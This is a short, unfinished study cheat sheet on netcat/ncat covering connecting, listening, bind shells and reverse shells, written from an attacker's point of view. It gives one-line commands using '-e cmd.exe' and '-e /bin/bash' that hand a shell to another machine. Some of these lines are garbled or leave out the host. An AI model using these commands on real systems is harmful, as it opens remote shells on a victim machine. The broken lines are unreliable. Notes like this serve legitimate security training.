Netcat/Ncat - WIP

Purpose? - To establish connections on open ports and create listening ports on local machine | REVERSE SHELL Section in development

This tool allows us to bind to a given port of a given IP address. It is of help when trying to send files between machines, developing exploit payloads that would serve a backdoor on a target.

The scope of this document limits to a discussion of how to use netcat/ncat to connect to clients and serve opening ports

Connecting vs Listening

To attempt to establish a connection with TCP port:

nc -nv [destination ip] [destination port]

To listen on TCP port:

nc -nvlp 4444

Bind Shell: Attacker connects to a victim on listening PORTS

  1. On Windows Machine - set netcat/ncat to listen on 4444/TCP:

    Once Netcat is running 'Cmd line:' prompt will appear; we will pass it the command line executable.

    nc -nvlp 4444 -e cmd.exe

  2. On Linux Machine - set netcat to connect to 4444/TCP:

    nc -nv 4444 -e /bin/bash

In the Bind Shell case described in 1 & 2 the Windows machine is the victim that has been set up to listen on 4444/TCP

Reverse Shell: Victim connects to attacker on listening PORTS

This is the one you will be using the most

  1. On Linux Machine - set netcat to listen on 4444/tcp:

    nc -nvlp 4444

  2. On Windows Machine - connect to machine on 4444/tcp:


    Once Netcat is running 'Cmd line:' prompt will appear; we will 'pass the destination host'? the command line executable (-e)

    Once Netcat is running 'Cmd line:' prompt will appear; we will pass it the command line executable.

    Cmd line: -nv 4444 -e cmd.exe

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